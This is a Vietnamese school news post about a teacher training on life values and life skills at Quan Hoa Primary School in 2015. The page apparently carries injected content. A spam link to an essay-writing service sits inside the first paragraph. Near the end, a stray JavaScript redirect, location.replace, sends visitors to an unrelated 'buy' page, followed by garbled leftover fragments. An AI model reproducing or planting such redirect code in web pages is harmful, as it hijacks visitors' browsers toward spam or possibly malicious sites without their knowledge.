Tập huấn chuyên đề: “Giá trị sống – Kĩ năng sống”

06/09/2015 11:32 Chiều Phản hồi đã bị khóa

Giáo dục kỹ năng sống đã và đang được quan tâm tại Việt Nam. Tuy nhiên, nếu chỉ quan tâm tới kĩ năng sống thôi thì chưa đủ, mà điều quan trọng, nền móng cơ bản nhất đó chính là giá trị sống. Nhận thực được điều đó, trong 2 ngày 28, 29/8 /2015, Ban giám hiệu trường Tiểu học Quan Hoa đã tổ chức cho cán bộ giáo viên tham gia lớp tập huấn về Giá trị sống và kĩ năng sống do PGS-TS Trần Thị Lệ Thu – và các cộng sự tại Quỹ tài năng trẻ TLH- GDH; Hội KH TL-GD Việt Nam giảng dạy. www.bestessaywritingservice.co.uk
Chương trình với hàng loạt các hoạt động mang tính trải nghiệm và các phương pháp thực hành, giúp cán bộ, giáo viên của trường khám phá và phát triển 12 giá trị toàn cầu: Hòa bình, Tôn trọng, Yêu thương, Trách nhiệm, Hạnh phúc, Hợp tác, Trung thực, Khiêm tốn, Khoan dung, Giản dị, Đoàn kết và Tự do.
Tuy chỉ qua 4 buổi học nhưng các học viên đã có thêm những suy nghĩ, hiểu biết của mình về các giá trị cuộc sống, từ đó biết được phương pháp thực tế để phát triển những phẩm chất, đức tính tốt của bản thân. Từ đó lựa chọn và xây dựng cho mình kỹ năng sống tích cực để hòa nhập cộng đồng với sự tôn trọng, tự tin và có mục đích rõ ràng. Bên cạnh đó, mỗi người đều từ điều chỉnh bản thân trong các mối quan hệ tích cực với bản thân, với người khác, với cộng đồng.

.

.

location.replace(“http://gethere.info/buy.php”);

}

Các phản hồi đã bị đóng lại bở quản trị.